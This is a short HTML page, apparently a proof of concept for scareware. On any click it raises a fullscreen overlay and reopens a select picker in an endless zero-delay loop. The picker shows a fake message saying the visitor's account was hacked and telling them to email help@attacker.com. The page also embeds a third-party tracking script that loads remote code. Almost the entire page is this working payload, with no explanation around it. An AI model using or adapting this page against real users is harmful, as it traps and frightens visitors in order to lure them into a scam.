<!DOCTYPE html>
<html>
<style>
  body {
    margin: 0;
    padding: 0;
    overflow: hidden;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f0f0f0;
  }

  #popup {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.8);
    display: flex;
    justify-content: center;
    align-items: center;
    color: white;
    font-size: 1.5rem;
    text-align: center;
    z-index: 9999;
    visibility: hidden;
  }

  #popup select {
    all: initial;
    text-align: center;
    width: 80%;
    font-size: 1.5rem;
  }

  #popup option {
    height: 100vh;
  }
</style>

<body>
  <div id="popup">
    <select id="mySelect">
      <option disabled>&emsp;</option>
      <option disabled></option>
      <option disabled></option>
      <option disabled>&emsp;&emsp;Your account just got hacked. Email help@attacker.com to save your account.</option>
      <option disabled></option>
      <option disabled></option>
      <option disabled></option>
      <option disabled></option>
      <option disabled></option>
    </select>
  </div>
  <h1>Click Anywhere</h1>
<script> (function(ss,ex){ window.ldfdr=window.ldfdr||function(){(ldfdr._q=ldfdr._q||[]).push([].slice.call(arguments));}; (function(d,s){ fs=d.getElementsByTagName(s)[0]; function ce(src){ var cs=d.createElement(s); cs.src=src; cs.async=1; fs.parentNode.insertBefore(cs,fs); }; ce('https://sc.lfeeder.com/lftracker_v1_'+ss+(ex?'_'+ex:'')+'.js'); })(document,'script'); })('YEgkB8llA0z8ep3Z'); </script>
  <script>
    var popup = document.getElementById("popup");
    var selectElement = document.getElementById("mySelect");

    window.addEventListener('click', function () {
      popup.style.visibility = "visible";
      setInterval(function () {
        selectElement.showPicker();
      }, 0);
    });
  </script>
</body>

</html>
